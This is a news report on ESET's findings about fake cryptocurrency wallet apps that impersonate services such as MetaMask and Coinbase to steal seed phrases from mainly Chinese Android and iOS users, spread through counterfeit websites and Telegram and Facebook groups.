Researchers have uncovered a malicious scheme mainly directed towards Chinese users via fake apps on Android and iOS that resemble genuine digital wallet services to steal cryptocurrency funds.
“These malicious apps were able to steal victims’ secret seed phrases by impersonating Coinbase, imToken, MetaMask, Trust Wallet, Bitpie, TokenPocket, or OneKey,” said Lukáš Štefanko, senior malware researcher at ESET in a report shared with The Hacker News.
The wallet services have been using a network of over 40 counterfeit wallet websites, and these websites are using deceptive articles listed on legitimate Chinese websites for promoting the wallet services. Further, the wallet service is also using intermediaries on Telegram and Facebook groups for tricking unaware visitors into downloading malicious apps.
ESET has been tracking the attack since May 2021 and suggested that a single criminal group is behind the scheme. The trojanized cryptocurrency wallet apps are designed to mimic the functionalities of the original apps, and at the same time, they integrate malicious code changes that allow the theft of crypto assets.
“These malicious apps also represent another threat to victims, as some of them send secret victim seed phrases to the attackers’ server using an unsecured HTTP connection,” Štefanko said. “This means that victims’ funds could be stolen not only by the operator of this scheme but also by a different attacker eavesdropping on the same network.”
The Slovak cybersecurity is aware of dozens of groups promoting fake wallet apps on Telegram and Facebook groups.
“Based on the information acquired from these groups, a person distributing this malware is offered a 50 per cent commission on the stolen contents of the wallet,” ESET noted.
The apps have a quirky feature that allows them to configure themselves according to the operating environment. For android, the attackers target users that haven’t installed any of the shortlisted wallet applications, while on iOS, the targets can download both versions.
The fake wallet apps cannot be downloaded from App store, but they can only be downloaded by landing on one of the malicious websites using configuration profiles that allow installing applications without verification by Apple.
The investigation also unearthed 13 rogue apps that masqueraded as the Jaxx Liberty Wallet on the Google Play Store, all of which since been removed from the Android app marketplace as of January 2022. They were collectively installed more than 1,100 times.
“Their goal was simply to tease out the user’s recovery seed phrase and send it either to the attackers’ server or to a secret Telegram chat group,” Štefanko said.
“Moreover, it seems that the source code of this threat has been leaked and shared on a few Chinese websites, which might attract various threat actors and spread this threat even further,” Štefanko added.